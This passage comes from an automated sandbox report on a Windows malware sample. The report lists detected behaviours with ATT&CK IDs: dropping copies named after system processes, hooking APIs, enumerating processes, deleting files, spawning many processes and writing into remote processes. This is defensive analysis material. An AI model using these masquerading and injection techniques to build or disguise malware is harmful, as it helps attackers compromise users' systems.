[%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00005816]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00004308]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00005816]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00004308]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00005816]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"Data HAPUBWS.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\Data %OSUSER%.exe]- [targetUID: 00000000-00005816]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00005816]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00004308]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00004308]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00004308]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00004308]\n \"D3_08.EXE.67EE4B9C.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter bfcc3df561a4db01 & bf9cc6b872a4db01 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter 1e3b4f5362a4db01 & 1e0bd81673a4db01 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter @RG & 4022d0b872a4db01 (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter 4ca3f55562a4db01 & Ls~ (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"FileTimeToLocalFileTime\" with parameter b530445662a4db01 & b500cd1973a4db01 (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"D3_08.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"D3_08.exe\"\n \"WinExec@KERNEL32.DLL\" in \"D3_08.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"D3_08.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"D3_08.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-284", "type": 6, "relevance": 1, "name": "Opens a handle to the specified local process", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Users\\HAPUBWS\\AppData\\Local\\WINLOGON.EXE\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Windows\\System32\\taskhost.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Windows\\System32\\dwm.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Windows\\explorer.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Windows\\System32\\conhost.exe\" (UID: 00000000-00005816)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opens a process \"C:\\Windows\\D3_08.exe\" (UID: 00000000-00005816)", "origin": "API Call", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\IExplorer.exe\" for deletion\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"K:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"L:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"M:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"N:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"O:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"P:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"Q:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"R:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"S:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"T:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"U:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"V:\"\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" (UID: 00000000-00005816)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005972)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006136)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003264)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004272)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006072)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004132)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004124)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003836)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002164)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002428)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003016)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003628)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003096)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004088)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003756)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004308)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003916)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003360)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002380)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006140)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006120)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003976)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002060)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003668)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004300)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003000)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001772)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002272)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000304)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001440)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000944)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002496)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002964)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003856)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003640)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003460)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001620)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002628)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001312)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004060)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003672)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003224)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003164)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002228)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003696)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003188)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003120)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003064)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004808)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 584)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 584)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 584)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 616)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 616)\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 616)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 